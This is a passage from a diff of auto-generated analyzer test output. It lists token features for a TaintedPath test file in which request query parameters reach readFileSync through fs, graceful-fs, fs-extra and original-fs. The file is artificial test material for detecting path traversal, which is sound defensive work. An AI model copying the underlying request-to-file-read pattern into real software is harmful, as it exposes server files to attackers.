contextFunctionInterfaces | getFsModule(special) | | autogenerated/TaintedPath/other-fs-libraries.js:3:16:3:19 | "fs" | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/other-fs-libraries.js:3:16:3:19 | "fs" | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:4:3:4:12 | gracefulFs | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:4:3:4:12 | gracefulFs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:4:3:4:12 | gracefulFs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:4:3:4:12 | gracefulFs | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:4:3:4:37 | gracefu ... ul-fs") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:4:3:4:37 | gracefu ... ul-fs") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:4:3:4:37 | gracefu ... ul-fs") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:4:3:4:37 | gracefulFs | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:4:3:4:37 | gracefulFs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:4:3:4:37 | gracefulFs | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:4:16:4:22 | require | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:4:16:4:22 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:4:16:4:22 | require | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:4:16:4:37 | exceptional return of require ... ul-fs") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:4:16:4:37 | exceptional return of require ... ul-fs") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:4:16:4:37 | exceptional return of require ... ul-fs") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:4:16:4:37 | require ... ul-fs") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:4:16:4:37 | require ... ul-fs") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:4:16:4:37 | require ... ul-fs") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:4:24:4:36 | "graceful-fs" | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/other-fs-libraries.js:4:24:4:36 | "graceful-fs" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:4:24:4:36 | "graceful-fs" | calleeImports | | | autogenerated/TaintedPath/other-fs-libraries.js:4:24:4:36 | "graceful-fs" | contextFunctionInterfaces | getFsModule(special) | | autogenerated/TaintedPath/other-fs-libraries.js:4:24:4:36 | "graceful-fs" | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/other-fs-libraries.js:4:24:4:36 | "graceful-fs" | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:5:3:5:9 | fsExtra | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:5:3:5:9 | fsExtra | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:5:3:5:9 | fsExtra | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:5:3:5:9 | fsExtra | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:5:3:5:31 | fsExtra | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:5:3:5:31 | fsExtra | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:5:3:5:31 | fsExtra | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:5:3:5:31 | fsExtra ... extra") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:5:3:5:31 | fsExtra ... extra") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:5:3:5:31 | fsExtra ... extra") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:5:13:5:19 | require | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:5:13:5:19 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:5:13:5:19 | require | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:5:13:5:31 | exceptional return of require("fs-extra") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:5:13:5:31 | exceptional return of require("fs-extra") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:5:13:5:31 | exceptional return of require("fs-extra") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:5:13:5:31 | require("fs-extra") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:5:13:5:31 | require("fs-extra") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:5:13:5:31 | require("fs-extra") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:5:21:5:30 | "fs-extra" | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/other-fs-libraries.js:5:21:5:30 | "fs-extra" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:5:21:5:30 | "fs-extra" | calleeImports | | | autogenerated/TaintedPath/other-fs-libraries.js:5:21:5:30 | "fs-extra" | contextFunctionInterfaces | getFsModule(special) | | autogenerated/TaintedPath/other-fs-libraries.js:5:21:5:30 | "fs-extra" | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/other-fs-libraries.js:5:21:5:30 | "fs-extra" | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:6:3:6:12 | originalFs | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:6:3:6:12 | originalFs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:6:3:6:12 | originalFs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:6:3:6:12 | originalFs | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:6:3:6:37 | origina ... al-fs") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:6:3:6:37 | origina ... al-fs") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:6:3:6:37 | origina ... al-fs") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:6:3:6:37 | originalFs | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:6:3:6:37 | originalFs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:6:3:6:37 | originalFs | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:6:16:6:22 | require | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:6:16:6:22 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:6:16:6:22 | require | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:6:16:6:37 | exceptional return of require ... al-fs") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:6:16:6:37 | exceptional return of require ... al-fs") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:6:16:6:37 | exceptional return of require ... al-fs") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:6:16:6:37 | require ... al-fs") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:6:16:6:37 | require ... al-fs") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:6:16:6:37 | require ... al-fs") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:6:24:6:36 | "original-fs" | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/other-fs-libraries.js:6:24:6:36 | "original-fs" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:6:24:6:36 | "original-fs" | calleeImports | | | autogenerated/TaintedPath/other-fs-libraries.js:6:24:6:36 | "original-fs" | contextFunctionInterfaces | getFsModule(special) | | autogenerated/TaintedPath/other-fs-libraries.js:6:24:6:36 | "original-fs" | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/other-fs-libraries.js:6:24:6:36 | "original-fs" | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:8:5:8:10 | server | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:8:5:8:10 | server | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:8:5:8:10 | server | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:8:5:25:2 | server ... T OK\\n}) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:8:5:25:2 | server ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:8:5:25:2 | server ... T OK\\n}) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:8:14:8:17 | http | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:8:14:8:17 | http | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:8:14:8:17 | http | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:8:14:8:30 | http.createServer | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:8:14:8:30 | http.createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:8:14:8:30 | http.createServer | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:8:14:25:2 | exceptional return of http.cr ... T OK\\n}) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:8:14:25:2 | exceptional return of http.cr ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:8:14:25:2 | exceptional return of http.cr ... T OK\\n}) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:8:14:25:2 | http.cr ... T OK\\n}) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:8:14:25:2 | http.cr ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:8:14:25:2 | http.cr ... T OK\\n}) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:8:19:8:30 | createServer | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:8:19:8:30 | createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:8:19:8:30 | createServer | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | fs | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | fs | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | fsExtra | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | fsExtra | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | fsExtra | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | fsExtra | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | fsExtra | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | getFsModule | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | getFsModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | getFsModule | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | getFsModule | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | getFsModule | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | gracefulFs | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | gracefulFs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | gracefulFs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | gracefulFs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | gracefulFs | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | originalFs | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | originalFs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | originalFs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | originalFs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | originalFs | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | require | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | require | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | require | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | this | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | this | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | this | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | url | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | url | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:8:31 | url | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:25:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:25:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:25:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:25:1 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:25:1 | 'arguments' object of anonymous function | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:25:1 | exceptional return of anonymous function | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:25:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:25:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:25:1 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:25:1 | exceptional return of anonymous function | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:8:32:25:1 | functio ... OT OK\\n} | CalleeFlexibleAccessPath | http.createServer | | autogenerated/TaintedPath/other-fs-libraries.js:8:32:25:1 | functio ... OT OK\\n} | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:8:32:25:1 | functio ... OT OK\\n} | calleeImports | http | @@ -9820,6 +80057,81 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:8:32:25:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/other-fs-libraries.js:8:32:25:1 | functio ... OT OK\\n} | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:8:32:25:1 | functio ... OT OK\\n} | receiverName | http | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:25:1 | return of anonymous function | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:25:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:25:1 | return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:25:1 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:8:32:25:1 | return of anonymous function | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:8:41:8:43 | req | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:8:41:8:43 | req | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:8:41:8:43 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:8:41:8:43 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:8:41:8:43 | req | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:8:41:8:43 | req | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:8:41:8:43 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:8:41:8:43 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:8:41:8:43 | req | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:8:41:8:43 | req | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:8:46:8:48 | res | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:8:46:8:48 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:8:46:8:48 | res | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:8:46:8:48 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:8:46:8:48 | res | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:9:7:9:10 | path | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:9:7:9:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:9:7:9:10 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:9:7:9:10 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:9:7:9:10 | path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:9:7:9:48 | path | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:9:7:9:48 | 